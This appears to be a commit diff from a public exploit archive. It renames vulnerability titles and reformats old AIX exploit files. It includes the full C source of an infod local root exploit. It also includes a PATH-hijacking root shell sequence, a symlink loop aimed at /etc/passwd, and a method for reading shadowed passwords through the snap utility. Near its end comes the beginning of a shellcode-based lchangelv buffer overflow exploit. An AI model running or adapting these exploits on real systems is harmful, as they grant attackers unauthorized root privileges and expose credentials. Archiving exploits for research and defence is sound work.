FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Buffer Overflow (Metasploit)

Viscom Software Movie Player Pro SDK ActiveX 6.8 - Exploit (Metasploit)
Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit)

Apple Personal Web Sharing 1.1 - Exploit
id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Exploit
id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution

Metainfo Sendmail 2.0/2.5 & MetaIP 3.1 - Exploit
Metainfo Sendmail 2.0/2.5 / MetaIP 3.1 -  Upload / Execute Read Scripts

IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit
IBM AIX 3.2/4.1 / SCO Unixware 7.1.1 / SGI IRIX 5.3 / Sun Solaris 2.5.1 - Privilege Escalation

HP HP-UX 10.34 rlpdaemon - Exploit
HP HP-UX 10.34 rlpdaemon - Remote Overflow

Ray Chan WWW Authorization Gateway 0.1 - Exploit
Ray Chan WWW Authorization Gateway 0.1 - Command Execution

Solaris 7.0 Coredump - Exploit
Solaris 7.0 - 'Coredump' File Write
IBM Scalable POWERparallel (SP) 2.0 sdrd - Exploit
SGI IRIX 6.2 cgi-bin wrap - Exploit
IBM Scalable POWERparallel (SP) 2.0 - 'sdrd' File Read
SGI IRIX 6.2 - cgi-bin wrap Exploit

SGI IRIX 6.5.2 nsd - Exploit
SGI IRIX 6.5.2 - 'nsd'' Exploit

IBM AIX 3.2.5 - login(1) Exploit
IBM AIX 3.2.5 - 'login(1)' Exploit

Compaq Java Applet for Presario SpawnApp - Exploit
Compaq Java Applet for Presario SpawnApp - Code Execution

Network Security Wizards Dragon-Fire IDS 1.0 - Exploit
Network Security Wizards Dragon-Fire IDS 1.0 - Command Execution

Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Exploit
Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure

IBM AIX 4.3.2 ftpd - Remote Buffer Overflow
IBM AIX 4.3.2 - 'ftpd' Remote Buffer Overflow

glFTPd 1.17.2 - Exploit
glFTPd 1.17.2 - Code Execution

Netopia R-series routers 4.6.2 - Exploit
Netopia R-series Routers 4.6.2 - Modifying SNMP Tables

Sun Java Web Server 1.1.3/2.0 Servlets - Exploit
Sun Java Web Server 1.1.3/2.0 Servlets - information Disclosure

IPFilter 3.x - Fragment Rule Bypass

CGIWrap 2.x/3.x - Cross-Site Scripting

AIX 4.1/4.2 - pdnsd Buffer Overflow
AIX 4.1/4.2 - 'pdnsd' Buffer Overflow

RedHat Linux 7.0 Apache - Remote 'Username' Enumeration
RedHat Linux 7.0 Apache - Remote Username Enumeration

Hylafax 4.1.x - HFaxD Unspecified Format String
Hylafax 4.1.x - HFaxD Format String

EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow

LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities
LHA 1.x - 'extract_one' Multiple Buffer Overflow Vulnerabilities

Ethereal 0.x - Multiple Unspecified iSNS / SMB / SNMP Protocol Dissector Vulnerabilities
Ethereal 0.x - Multiple iSNS / SMB / SNMP Protocol Dissector Vulnerabilities

Oracle 9i - Multiple Unspecified Vulnerabilities
Oracle 9i - Multiple Vulnerabilities

File ELF 4.x - Header Unspecified Buffer Overflow
File ELF 4.x - Header Buffer Overflow
Microsoft PowerPoint 2003 - 'mso.dll' .PPT Processing Unspecified Code Execution
Microsoft PowerPoint 2003 - 'powerpnt.exe' Unspecified Issue
Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution
Microsoft PowerPoint 2003 - 'powerpnt.exe' Exploit
CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Unspecified Arbitrary File Manipulation
CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Unspecified Replay Attack
CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Arbitrary File Manipulation
CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Replay Attack
Microsoft Internet Explorer 6 - Unspecified Code Execution (1)
Microsoft Internet Explorer 6 - Unspecified Code Execution (2)
Microsoft Internet Explorer 6 - Code Execution (1)
Microsoft Internet Explorer 6 - Code Execution (2)

GNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal
GNU Tar 1.1x - 'GNUTYPE_NAMES' Directory Traversal

TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal
TFTP Server TFTPDWin 0.4.2 - Directory Traversal

Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified
Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Exploit

Multiple CA Service Management Products - Unspecified Remote Command Execution
Multiple CA Service Management Products - Remote Command Execution

NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow

Bash - Environment Variables Code Injection (Shellshock)
Bash - Environment Variables Command Injection (Shellshock)

OpenVPN 2.2.29 - Remote Exploit (Shellshock)
OpenVPN 2.2.29 - Remote Command Injection (Shellshock)
Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)
Apache mod_cgi - Remote Exploit (Shellshock)
Postfix SMTP 4.2.x < 4.2.48 - Remote Command Injection (Shellshock)
Apache mod_cgi - Remote Command Injection (Shellshock)

Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow
Poison Ivy 2.3.2 - Remote Buffer Overflow

Samba 3.5.11/3.6.3 - Unspecified Remote Code Execution
Samba 3.5.11/3.6.3 - Remote Code Execution

Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)
Advantech Switch - Bash Environment Variable Command Injection (Shellshock) (Metasploit)

Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)

IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)
IPFire - Bash Environment Variable Command Injection (Shellshock) (Metasploit)

TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)
TrendMicro InterScan Web Security Virtual Appliance - Remote Command Injection (Shellshock)

Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion
Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion

Poll It CGI 2.0 - Exploit
Poll It CGI 2.0 - Multiple Vulnerabilities

DreamPoll 3.1 - Exploit
DreamPoll 3.1 - SQL Injection

WordPress Plugin WP-Cumulus 1.20 - Exploit
WordPress Plugin WP-Cumulus 1.20 - Full Path Disclosure / Cross-Site Scripting

Public Media Manager - Exploit
Public Media Manager - Remote File Inclusion

Joomla! Component com_adagency - Exploit
Joomla! Component com_adagency - Local File Inclusion

File Upload Manager 1.3 - Exploit
File Upload Manager 1.3 - Web Shell File Upload

Joomla! Component com_caddy - Exploit

Renista CMS - Exploit
Renista CMS - SQL Injection

BtiTracker 1.3.x < 1.4.x - Exploit
BtiTracker 1.3.x < 1.4.x - SQL Injection

WordPress Plugin Cimy Counter - Exploit
WordPress Plugin Cimy Counter - Full Path Disclosure / Redirector / Cross-Site Scripting / HTTP Response Spitting

Belkin F5D7234-4 v5 G Wireless Router - Exploit
Belkin F5D7234-4 v5 G Wireless Router - Remote Hash Exposed

WhatsApp Status Changer 0.2 - Exploit
WhatsApp - Remote Change Status

MySimpleNews 1.0 - Remotely Readable Administrator Password
MySimpleNews 1.0 - Remote Readable Administrator Password

SquirrelMail 1.2.11 - Exploit
SquirrelMail 1.2.11 - Multiple Vulnerabilities

D-Link DCS-936L Network Camera - Cross-Site Request Forgery
Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion
Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting
Yappa-ng 1.x/2.x - Remote File Inclusion
Yappa-ng 1.x/2.x - Cross-Site Scripting

Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities
Aenovo - Multiple Cross-Site Scripting Vulnerabilities

Codegrrl - 'Protection.php' Unspecified Code Execution
Codegrrl - 'Protection.php' Code Execution
Red Mombin 0.7 - 'index.php' Unspecified Cross-Site Scripting
Red Mombin 0.7 - 'process_login.php' Unspecified Cross-Site Scripting
Red Mombin 0.7 - 'index.php' Cross-Site Scripting
Red Mombin 0.7 - 'process_login.php' Cross-Site Scripting

A-Blog 1.0 - Unspecified Cross-Site Scripting
A-Blog 1.0 - Cross-Site Scripting

Liens_Dynamiques 2.1 - Multiple Unspecified Cross-Site Scripting Vulnerabilities
Liens_Dynamiques 2.1 - Multiple Cross-Site Scripting Vulnerabilities

WordPress Plugin Akismet 2.1.3 - Unspecified
WordPress Plugin Akismet 2.1.3 - Exploit

SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Remote Command Execution Vulnerabilities

UPC Ireland Cisco EPC 2425 Router / Horizon Box - Exploit
UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information

Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload
Korean GHBoard - 'Component/upload.jsp' Arbitrary File Upload

MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injections
MyPHP Forum 3.0 - 'search.php' Multiple SQL Injections

Zoph 0.7.2.1 - Unspecified SQL Injection
Zoph 0.7.2.1 - SQL Injection

Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection
Joomla! Component FreiChat 1.0/2.x - HTML Injection

Bash CGI - Remote Code Execution (Shellshock) (Metasploit)
Bash CGI - Remote Command Injection (Shellshock) (Metasploit)

PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock)
PHP < 5.6.2 - 'disable_functions()' Bypass Command Injection (Shellshock)

Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Unspecified Security Vulnerabilities
Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Security Vulnerabilities

Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security
Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Security Exploit

Netsweeper 4.0.8 - Authentication Bypass Issue
Netsweeper 4.0.8 - Authentication Bypass

SimpleInvoices invoices Module - Unspecified Customer Field Cross-Site Scripting
SimpleInvoices invoices Module - Customer Field Cross-Site Scripting

Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting
Bugzilla 4.2 - Tabular Reports Cross-Site Scripting

iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal
iScripts AutoHoster - 'main_smtp.php' Traversal Exploit

Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues
Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Exploits

Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Exploit (Shellshock)
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)

NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)
NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)

Squid Analysis Report Generator 2.3.10 - Remote Code Execution

platforms/aix/dos/19043.txt

@@ -13,4 +13,4 @@ $ set PATH=/tmp:$PATH
 $ export PATH
 $ /usr/bin/winstall
 $ /tmp/sh
-# 
+#

platforms/aix/dos/19045.txt

@@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/59/info
 /etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.
 
 $ /etc/crash
-! sh 
+! sh

platforms/aix/dos/19046.txt

@@ -12,4 +12,4 @@ HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
 [ and it just hangs ]
 
 $ ping some.where
-[ ...nothing... ] 
+[ ...nothing... ]

platforms/aix/dos/19049.txt

@@ -7,4 +7,4 @@ $ nmap -p 1-64000 -i <target host>
 
 It is also claimed inetd will die if the Windows 95/NT
 program postscan.exe, made by 7thsphere, is run againts
-the host. 
+the host.

platforms/aix/local/19215.c

@@ -1,6 +1,8 @@
+/*
 source: http://www.securityfocus.com/bid/268/info
   
 A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
+*/
 
 /*============================================================
    ex_lobc.c Overflow Exploits( for Sparc Edition)

platforms/aix/local/19217.c

@@ -1,6 +1,8 @@
+/*
 source: http://www.securityfocus.com/bid/268/info
     
 A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
+*/
 
 /*============================================================
    ex_lobc.c Overflow Exploits( for Sparc Edition)

platforms/aix/local/19229.txt

@@ -11,4 +11,4 @@ ln -s /etc/passwd /tmp/fwlsuser.$x
 let x=$x+1
 echo $x
 done
-exit 
+exit

platforms/aix/local/19287.c

@@ -1,226 +1,226 @@
+/*
 source: http://www.securityfocus.com/bid/370/info
 
 Certain versions of AIX ship with an Information Daemon, infod. This program is designed to provide information about the OS and installed ancilliary programs. The daemon which runs as root, does not check credentials which are passed to it. This allows users to pass requests with arbitrary UID's. If a user passes infod a request as root, they can goto the default options menu and change the printer command line to an alternate binary such as /bin/sh that gives privileges to the account the session was spawned under.
+*/
 
-    /* Infod AIX exploit (k) Arisme 21/11/98  - All Rights Reversed
-       Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)
+/* Infod AIX exploit (k) Arisme 21/11/98  - All Rights Reversed
+   Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)
 
-       Run program with the login you want to exploit :)
-       When the window appears, select "options", "defaults", change printer
-       to something more useful (like /bin/x11/xterm) and print !
+   Run program with the login you want to exploit :)
+   When the window appears, select "options", "defaults", change printer
+   to something more useful (like /bin/x11/xterm) and print !
 
-       Comments,questions : arisme@altern.org */
+   Comments,questions : arisme@altern.org */
 
 
-    #include <sys/types.h>
-    #include <sys/socket.h>
-    #include <sys/un.h>
-    #include <netdb.h>
-    #include <stdio.h>
-    #include <stdlib.h>
-    #include <pwd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pwd.h>
 
-    #define TAILLE_BUFFER 2000
-    #define SOCK_PATH "/tmp/.info-help"
-    #define PWD "/tmp"
+#define TAILLE_BUFFER 2000
+#define SOCK_PATH "/tmp/.info-help"
+#define PWD "/tmp"
 
-    #define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-0
-9-98.AIX.INFOD (http://www.repsec.com)"
-    #define NOUSER "Use : infofun [login]"
-    #define UNKNOWN "User does not exist !"
-    #define OK "Waiting for magic window ... if you have problems check the xho
-st "
+#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)"
+#define NOUSER "Use : infofun [login]"
+#define UNKNOWN "User does not exist !"
+#define OK "Waiting for magic window ... if you have problems check the xhost "
 
-    void send_environ(char *var,FILE *param)
-    { char tempo[TAILLE_BUFFER];
-      int taille;
+void send_environ(char *var,FILE *param)
+{ char tempo[TAILLE_BUFFER];
+  int taille;
 
-      taille=strlen(var);
-      sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
-      fwrite(tempo,1,taille+4,param);
-    }
+  taille=strlen(var);
+  sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
+  fwrite(tempo,1,taille+4,param);
+}
 
-    main(int argc,char** argv)
-    { struct sockaddr_un sin,expediteur;
-      struct hostent *hp;
-      struct passwd *info;
-      int chaussette,taille_expediteur,port,taille_struct,taille_param;
-      char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
-      FILE *param;
+main(int argc,char** argv)
+{ struct sockaddr_un sin,expediteur;
+  struct hostent *hp;
+  struct passwd *info;
+  int chaussette,taille_expediteur,port,taille_struct,taille_param;
+  char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
+  FILE *param;
 
-      char *HOME,*LOGIN;
-      int UID,GID;
+  char *HOME,*LOGIN;
+  int UID,GID;
 
-      printf("\n\n%s\n\n",KOPY);
+  printf("\n\n%s\n\n",KOPY);
 
-      if (argc!=2) { printf("%s\n",NOUSER);
-                     exit(1); }
+  if (argc!=2) { printf("%s\n",NOUSER);
+                 exit(1); }
 
 
-      info=getpwnam(argv[1]);
-      if (!info)   { printf("%s\n",UNKNOWN);
-                     exit(1); }
+  info=getpwnam(argv[1]);
+  if (!info)   { printf("%s\n",UNKNOWN);
+                 exit(1); }
 
-      HOME=info->pw_dir;
-      LOGIN=info->pw_name;
-      UID=info->pw_uid;
-      GID=info->pw_gid;
+  HOME=info->pw_dir;
+  LOGIN=info->pw_name;
+  UID=info->pw_uid;
+  GID=info->pw_gid;
 
-      param=fopen("/tmp/tempo.fun","wb");
+  param=fopen("/tmp/tempo.fun","wb");
 
-      chaussette=socket(AF_UNIX,SOCK_STREAM,0);
-      sin.sun_family=AF_UNIX;
-      strcpy(sin.sun_path,SOCK_PATH);
-      taille_struct=sizeof(struct sockaddr_un);
+  chaussette=socket(AF_UNIX,SOCK_STREAM,0);
+  sin.sun_family=AF_UNIX;
+  strcpy(sin.sun_path,SOCK_PATH);
+  taille_struct=sizeof(struct sockaddr_un);
 
 
-      if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
-         { perror("connect");
-           exit(1); }
+  if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
+     { perror("connect");
+       exit(1); }
 
 
-      /* 0 0 PF_UID pf_UID 0 0 */
+  /* 0 0 PF_UID pf_UID 0 0 */
 
-      sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
-      fwrite(buffer,1,6,param);
+  sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
+  fwrite(buffer,1,6,param);
 
-      /* PF_GID pf_GID */
-      sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
-      fwrite(buffer,1,2,param);
+  /* PF_GID pf_GID */
+  sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
+  fwrite(buffer,1,2,param);
 
-      /* DISPLAY (259) */
+  /* DISPLAY (259) */
 
-      bzero(buffer,TAILLE_BUFFER);
-      strcpy(buffer,getenv("DISPLAY"));
-      fwrite(buffer,1,259,param);
+  bzero(buffer,TAILLE_BUFFER);
+  strcpy(buffer,getenv("DISPLAY"));
+  fwrite(buffer,1,259,param);
 
-      /* LANG (1 C 0 0 0 0 0 0 0) */
+  /* LANG (1 C 0 0 0 0 0 0 0) */
 
-      sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
-      fwrite(buffer,1,9,param);
+  sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
+  fwrite(buffer,1,9,param);
 
-      /* size_$HOME $HOME 0 0 0 */
+  /* size_$HOME $HOME 0 0 0 */
 
-      send_environ(HOME,param);
+  send_environ(HOME,param);
 
-      /* size_$LOGNAME $LOGNAME 0 0 0 */
+  /* size_$LOGNAME $LOGNAME 0 0 0 */
 
-      send_environ(LOGIN,param);
+  send_environ(LOGIN,param);
 
-      /* size_$USERNAME $USERNAME 0 0 0 */
+  /* size_$USERNAME $USERNAME 0 0 0 */
 
-      send_environ(LOGIN,param);
+  send_environ(LOGIN,param);
 
-      /* size_$PWD $PWD 0 0 0 */
+  /* size_$PWD $PWD 0 0 0 */
 
-      send_environ(PWD,param);
+  send_environ(PWD,param);
 
-      /* size_DISPLAY DISPLAY 0 0 0 */
+  /* size_DISPLAY DISPLAY 0 0 0 */
 
-      //send_environ(ptsname(0),param);
+  //send_environ(ptsname(0),param);
 
-      /* If we send our pts, info_gr will crash as it has already changed UID *
+  /* If we send our pts, info_gr will crash as it has already changed UID *
 /
 
-      send_environ("/dev/null",param);
+  send_environ("/dev/null",param);
 
-      /* It's probably not useful to copy all these environment vars but it was
-         good for debugging :) */
+  /* It's probably not useful to copy all these environment vars but it was
+     good for debugging :) */
 
-      sprintf(buffer,"%c%c%c%c",23,0,0,0);
-      fwrite(buffer,1,4,param);
+  sprintf(buffer,"%c%c%c%c",23,0,0,0);
+  fwrite(buffer,1,4,param);
 
-      sprintf(buffer,"_=./startinfo");
-      send_environ(buffer,param);
+  sprintf(buffer,"_=./startinfo");
+  send_environ(buffer,param);
 
-      sprintf(buffer,"TMPDIR=/tmp");
-      send_environ(buffer,param);
+  sprintf(buffer,"TMPDIR=/tmp");
+  send_environ(buffer,param);
 
-      sprintf(buffer,"LANG=%s",getenv("LANG"));
-      send_environ(buffer,param);
+  sprintf(buffer,"LANG=%s",getenv("LANG"));
+  send_environ(buffer,param);
 
-      sprintf(buffer,"LOGIN=%s",LOGIN);
-      send_environ(buffer,param);
+  sprintf(buffer,"LOGIN=%s",LOGIN);
+  send_environ(buffer,param);
 
-      sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
-      send_environ(buffer,param);
+  sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
+  send_environ(buffer,param);
 
-      sprintf(buffer,"PATH=%s",getenv("PATH"));
-      send_environ(buffer,param);
+  sprintf(buffer,"PATH=%s",getenv("PATH"));
+  send_environ(buffer,param);
 
-      sprintf(buffer,"%s","EDITOR=emacs");
-      send_environ(buffer,param);
+  sprintf(buffer,"%s","EDITOR=emacs");
+  send_environ(buffer,param);
 
-      sprintf(buffer,"LOGNAME=%s",LOGIN);
-      send_environ(buffer,param);
+  sprintf(buffer,"LOGNAME=%s",LOGIN);
+  send_environ(buffer,param);
 
-      sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
-      send_environ(buffer,param);
+  sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
+  send_environ(buffer,param);
 
-      sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
-      send_environ(buffer,param);
+  sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
+  send_environ(buffer,param);
 
-      sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
-      send_environ(buffer,param);
- 
-      sprintf(buffer,"%s","PS1=(exploited !) ");
-      send_environ(buffer,param);
+  sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
+  send_environ(buffer,param);
 
-      sprintf(buffer,"USER=%s",LOGIN);
-      send_environ(buffer,param);
+  sprintf(buffer,"%s","PS1=(exploited !) ");
+  send_environ(buffer,param);
 
-      sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
-      send_environ(buffer,param);
+  sprintf(buffer,"USER=%s",LOGIN);
+  send_environ(buffer,param);
 
-      sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
-      send_environ(buffer,param);
+  sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
+  send_environ(buffer,param);
 
-      sprintf(buffer,"SHELL=%s",getenv("SHELL"));
-      send_environ(buffer,param);
+  sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
+  send_environ(buffer,param);
 
-      sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
-      send_environ(buffer,param);
+  sprintf(buffer,"SHELL=%s",getenv("SHELL"));
+  send_environ(buffer,param);
 
-      sprintf(buffer,"HOME=%s",HOME);
-      send_environ(buffer,param);
+  sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
+  send_environ(buffer,param);
 
-      sprintf(buffer,"%s","TERM=vt220");
-      send_environ(buffer,param);
+  sprintf(buffer,"HOME=%s",HOME);
+  send_environ(buffer,param);
 
-      sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
-      send_environ(buffer,param);
+  sprintf(buffer,"%s","TERM=vt220");
+  send_environ(buffer,param);
 
-      sprintf(buffer,"PWD=%s",PWD);
-      send_environ(buffer,param);
+  sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
+  send_environ(buffer,param);
 
-      sprintf(buffer,"%s","TZ=NFT-1");
-      send_environ(buffer,param);
+  sprintf(buffer,"PWD=%s",PWD);
+  send_environ(buffer,param);
 
-      sprintf(buffer,"%s","A__z=! LOGNAME");
-      send_environ(buffer,param);
+  sprintf(buffer,"%s","TZ=NFT-1");
+  send_environ(buffer,param);
 
-      /* Start info_gr with -q parameter or the process will be run locally and
-         not from the daemon ... */
+  sprintf(buffer,"%s","A__z=! LOGNAME");
+  send_environ(buffer,param);
 
-      sprintf(buffer,"%c%c%c%c",1,45,113,0);
-      fwrite(buffer,1,4,param);
+  /* Start info_gr with -q parameter or the process will be run locally and
+     not from the daemon ... */
 
-      fclose(param);
+  sprintf(buffer,"%c%c%c%c",1,45,113,0);
+  fwrite(buffer,1,4,param);
 
-      param=fopen("/tmp/tempo.fun","rb");
-      fseek(param,0,SEEK_END);
-      taille_param=ftell(param);
-      fseek(param,0,SEEK_SET);
-      fread(paramz,1,taille_param,param);
-      fclose(param);
+  fclose(param);
 
-      unlink("/tmp/tempo.fun");
+  param=fopen("/tmp/tempo.fun","rb");
+  fseek(param,0,SEEK_END);
+  taille_param=ftell(param);
+  fseek(param,0,SEEK_SET);
+  fread(paramz,1,taille_param,param);
+  fclose(param);
 
-      /* Thank you Mr daemon :) */
+  unlink("/tmp/tempo.fun");
 
-      write(chaussette,paramz,taille_param);
+  /* Thank you Mr daemon :) */
 
-      printf("\n%s %s\n",OK,getenv("HOSTNAME"));
+  write(chaussette,paramz,taille_param);
 
-      close(chaussette);
-    }
+  printf("\n%s %s\n",OK,getenv("HOSTNAME"));
+
+  close(chaussette);
+}

platforms/aix/local/19300.txt

@@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/375/info
 
 The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file. 
 
-snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command. 
+snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.

platforms/aix/local/19306.c

@@ -1,6 +1,8 @@
+/*
 source: http://www.securityfocus.com/bid/385/info
 
 AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information. 
+*/
 
 /*## copyright LAST STAGE OF DELIRIUM oct 2000 poland        *://lsd-pl.net/ #*/
 /*## /usr/bin/portmir                                                        #*/

platforms/aix/local/19309.c

@@ -1,102 +1,101 @@
+/*
 source: http://www.securityfocus.com/bid/389/info
 
-
 A buffer overflow can occur in lchangelv under some versions of AIX. Note that an attacker must already have the GID or EGID of 'system' to execute lchangelv.
 
 Because lchangelv is SUID root, this overflow will grant the attacker root privileges.
+*/
 
-    /*
-     *
-     *   /usr/sbin/lchangelv (kinda' coded) by BeastMaster V
-     *
-     *   CREDITS: this is simply a modified version of an exploit
-     *   posted by Georgi Guninski (guninski@hotmail.com)
-     *
-     *   NOTES: you must have gid or egid of (system) to run this.
-     *
-     *   USAGE:
-     *            $ cc -o foo -g aix_lchangelv.c
-     *            $ ./foo 5100
-     *            #
-     *
-     *
-     *   HINT: Try giving ranges from 5090 through 5500
-     *
-     *   DISCLAIMER: use this program in a responsible manner.
-     *
-     */
+/*
+ *
+ *   /usr/sbin/lchangelv (kinda' coded) by BeastMaster V
+ *
+ *   CREDITS: this is simply a modified version of an exploit
+ *   posted by Georgi Guninski (guninski@hotmail.com)
+ *
+ *   NOTES: you must have gid or egid of (system) to run this.
+ *
+ *   USAGE:
+ *            $ cc -o foo -g aix_lchangelv.c
+ *            $ ./foo 5100
+ *            #
+ *
+ *
+ *   HINT: Try giving ranges from 5090 through 5500
+ *
+ *   DISCLAIMER: use this program in a responsible manner.
+ *
+ */
 
-    #include <stdio.h>
-    #include <stdlib.h>
-    #include <string.h>
-    #include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
 
-    extern int execv();
+extern int execv();
 
-    #define MAXBUF 600
+#define MAXBUF 600
 
-    unsigned int code[]={
-            0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
-            0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
-            0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
